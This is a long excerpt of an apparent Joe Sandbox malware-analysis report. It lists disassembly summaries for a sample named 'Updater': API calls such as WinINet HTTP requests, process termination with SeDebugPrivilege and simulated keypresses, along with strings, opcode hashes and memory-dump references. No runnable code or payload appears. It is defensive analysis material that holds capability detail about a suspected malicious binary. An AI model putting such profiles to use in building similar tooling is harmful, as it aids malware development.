                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                                                                    • Opcode ID: 8a7587a612c3b354b10700c54b29c341fb1fdd32e1dcc923fb159eefac614efb
                                                                                                                                                    • Instruction ID: 1d0ab5cc76d29722acfddb73a761a2a0f43880837ff5ad730af26ba8e9d9e916
                                                                                                                                                    • Opcode Fuzzy Hash: 8a7587a612c3b354b10700c54b29c341fb1fdd32e1dcc923fb159eefac614efb
                                                                                                                                                    • Instruction Fuzzy Hash: B1514F7190011AABCF15EBE0DC82EFEBBB9EF18700F5045B5F509621A1DF305A9ADB51
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                      • Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
                                                                                                                                                      • Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8
                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00BB9555
                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00BB955B
                                                                                                                                                    • ReleaseCapture.USER32 ref: 00BB9561
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00BB9609
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BB961C
                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00BB96FB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                                                    • Opcode ID: b0cafb59d3cca5355ac98460adc8e21bdbb63dfa9040c306a43cd7b33f081386
                                                                                                                                                    • Instruction ID: a28c19572ed133bb71f6948a0dfd998193e1ca3beac1eeb95a4911e4cf21e85a
                                                                                                                                                    • Opcode Fuzzy Hash: b0cafb59d3cca5355ac98460adc8e21bdbb63dfa9040c306a43cd7b33f081386
                                                                                                                                                    • Instruction Fuzzy Hash: 60519931204304AFD704EF24D896FBA77E4FB88714F004AADF65A972A1DBB5A904CB52
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9CD53
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9CD7B
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9CDAB
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B9CE03
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00B9CE17
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B9CE22
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                    • Opcode ID: 4f4c3dad005d65739333a64a514bd063e7d20f82d4ac544e572b83e031348959
                                                                                                                                                    • Instruction ID: 500943fd77aeae26cd00baeecb938ea37bfd861019b8fc6ecd37febb0cfd4157
                                                                                                                                                    • Opcode Fuzzy Hash: 4f4c3dad005d65739333a64a514bd063e7d20f82d4ac544e572b83e031348959
                                                                                                                                                    • Instruction Fuzzy Hash: 4A313AB1600604AFDB219F65DC88AAB7FFCEF49740B1045BAF44697200EB74EE149BA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B7690F,?,?,Bad directive syntax error,00BBD938,00000000,00000010,?,?), ref: 00B8A68C
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B7690F,?), ref: 00B8A693
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B8A757
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                    • Opcode ID: b950b21bdbd10b8981157c111da4b99627e4dccae81200c27f53e0b5409c5976
                                                                                                                                                    • Instruction ID: 717b1a124da9712cabc74ec6eb33a322b496e9195f3b811e931a6a17706732a2
                                                                                                                                                    • Opcode Fuzzy Hash: b950b21bdbd10b8981157c111da4b99627e4dccae81200c27f53e0b5409c5976
                                                                                                                                                    • Instruction Fuzzy Hash: 3C217E3184021EABCF11EF94DC56EFE77B5BF18700F0448E6F619620B2EA719A58DB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 00B83160
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00B83175
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B83202
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                    • Opcode ID: 3bc727b69c514576eff7cedf0a754981003234a24d7e16bbb30a87dd3f677cd6
                                                                                                                                                    • Instruction ID: e68b20829b537fddc2f36a9de82e58678f0a26403ed8e0c7ee01a07019b05b10
                                                                                                                                                    • Opcode Fuzzy Hash: 3bc727b69c514576eff7cedf0a754981003234a24d7e16bbb30a87dd3f677cd6
                                                                                                                                                    • Instruction Fuzzy Hash: 7811A77A244307BBE6103A219C0BDA77BDCDB15F64B2001A6F914B50F2FFB66A11A694
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                    • Opcode ID: dbd8ab2906233cb80a744b4344b39ae052af7b5eccbac674aa3e95c05104c8a7
                                                                                                                                                    • Instruction ID: 6ea3d7c1faa44d7d55514d1e07e1bf47e70d8de731f501c786a375dd08b8e908
                                                                                                                                                    • Opcode Fuzzy Hash: dbd8ab2906233cb80a744b4344b39ae052af7b5eccbac674aa3e95c05104c8a7
                                                                                                                                                    • Instruction Fuzzy Hash: 2B612771905341AFDB25AF68988277A7FF6DF06352F0405FDEE44EB281EA719C48C690
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B78FD7
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B78FF9
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B79011
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B7902F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B79050
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,00B2C4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B7905F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7907C
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,00B2C4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B7908B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                    • Opcode ID: ef6c16b8dad46ad4aa5540c801f5effcbe9deb20b3fa89195c4fa21531638ccd
                                                                                                                                                    • Instruction ID: 9df72832ead38cd0570c08f8d09e2ad39a84f2857a654ad1584333c858353ff4
                                                                                                                                                    • Opcode Fuzzy Hash: ef6c16b8dad46ad4aa5540c801f5effcbe9deb20b3fa89195c4fa21531638ccd
                                                                                                                                                    • Instruction Fuzzy Hash: 71517A70610605EFDB24DF24CC85BAA3BF6EF58310F214699F91697290EBB1ED80DB50
                                                                                                                                                    APIs
                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9CC63
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B9CC76
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00B9CC8A
                                                                                                                                                      • Part of subcall function 00B9CD34: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9CD53
                                                                                                                                                      • Part of subcall function 00B9CD34: GetLastError.KERNEL32 ref: 00B9CE03
                                                                                                                                                      • Part of subcall function 00B9CD34: SetEvent.KERNEL32(?), ref: 00B9CE17
                                                                                                                                                      • Part of subcall function 00B9CD34: InternetCloseHandle.WININET(00000000), ref: 00B9CE22
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                    • Opcode ID: 8c0e05b555e090c4d779e6554cfbc598943c1ca794eae17ee201b75e636bdd08
                                                                                                                                                    • Instruction ID: 96abfdc18b18d7b7c7554553a160899317086f66565c143c79a3d8c493bff143
                                                                                                                                                    • Opcode Fuzzy Hash: 8c0e05b555e090c4d779e6554cfbc598943c1ca794eae17ee201b75e636bdd08
                                                                                                                                                    • Instruction Fuzzy Hash: 5F315871200609BFDF219F65CC44AAABFF8FF49310B448579F84A83610DB75E810EBA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
                                                                                                                                                      • Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
                                                                                                                                                      • Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
                                                                                                                                                      • Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1
                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B83695
                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B836B3
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B836B7
                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B836C1
                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B836D9
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B836DD
                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B836E7
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B836FB
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B836FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$PostSleepThreadVirtual$AttachCurrentInputProcessSendTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2686503918-0
                                                                                                                                                    • Opcode ID: 00721bf8a20d7636e45e28de5ee183045003d7be5434c6d7512eed67faf0af2b
                                                                                                                                                    • Instruction ID: 6c0959c34b7bced40f1f39d29c3a8caaf6af154be774e51fa500a18091eb0368
                                                                                                                                                    • Opcode Fuzzy Hash: 00721bf8a20d7636e45e28de5ee183045003d7be5434c6d7512eed67faf0af2b
                                                                                                                                                    • Instruction Fuzzy Hash: 2C01B170794210BBFB106B689C8AF597B99DB4DF52F100011F318AF1E0DDE62844CA69
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B82557,?,?,00000000), ref: 00B82926
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B8292D
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B82557,?,?,00000000), ref: 00B82942
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00B82557,?,?,00000000), ref: 00B8294A
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B8294D
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B82557,?,?,00000000), ref: 00B8295D
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00B82557,00000000,?,00B82557,?,?,00000000), ref: 00B82965
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B82968
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00B8298E,00000000,00000000,00000000), ref: 00B82982
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                    • Opcode ID: 96997bbc46478f894d2661b2c5656db26a77b743e1623f2c1bf4d193082084e9
                                                                                                                                                    • Instruction ID: bdea008155248ce68bcc225d48d55b46bc67cb22a306f2194deb2507a067a203
                                                                                                                                                    • Opcode Fuzzy Hash: 96997bbc46478f894d2661b2c5656db26a77b743e1623f2c1bf4d193082084e9
                                                                                                                                                    • Instruction Fuzzy Hash: 6E01CDB5240308BFE710AFA9DC4DF6B7BACEB88711F444511FA05EB1A1DAB4D800CB21
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B8E2AB: CreateToolhelp32Snapshot.KERNEL32 ref: 00B8E2D0
                                                                                                                                                      • Part of subcall function 00B8E2AB: Process32FirstW.KERNEL32(00000000,?), ref: 00B8E2DE
                                                                                                                                                      • Part of subcall function 00B8E2AB: CloseHandle.KERNEL32(00000000), ref: 00B8E3BC
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAAB63
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00BAAB76
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAABA9
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BAAC5E
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00BAAC69
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BAACBA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                    • Opcode ID: 23c93f2e8743cfce1c90fe47744d763a63c0d92c957ab65cc1b4ec282f96a292
                                                                                                                                                    • Instruction ID: c32d0108fbc912c5c0256035ad9030977219bf187c8980a2b2eccdebe2eaf80c
                                                                                                                                                    • Opcode Fuzzy Hash: 23c93f2e8743cfce1c90fe47744d763a63c0d92c957ab65cc1b4ec282f96a292
                                                                                                                                                    • Instruction Fuzzy Hash: 2D619E30208202AFD720DF15C994F26BBE1EF45318F5484DCE45A8B7A2DBB5ED45CBA2
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BB42BD
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BB42D2
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BB42EC
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB4331
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BB435E
                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BB438C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                    • Opcode ID: 2fd2564ff84287958e0282e3f293e7a7d34b9586f62e5fdb2fa42af949470f1e
                                                                                                                                                    • Instruction ID: 7c1695cb9abd8fe30ea6860257743a4747cdcbacad0240e05a28967dd9fcb4fe
                                                                                                                                                    • Opcode Fuzzy Hash: 2fd2564ff84287958e0282e3f293e7a7d34b9586f62e5fdb2fa42af949470f1e
                                                                                                                                                    • Instruction Fuzzy Hash: FA41AF71A10218ABDF219F64CC45BFA7BE9FF08350F1101A6F958E7292E7B19D54CB90
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CB80
                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00B8CBA0
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00B8CBD6
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00B8CC34
                                                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B8CC5C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                    • String ID: 0$2
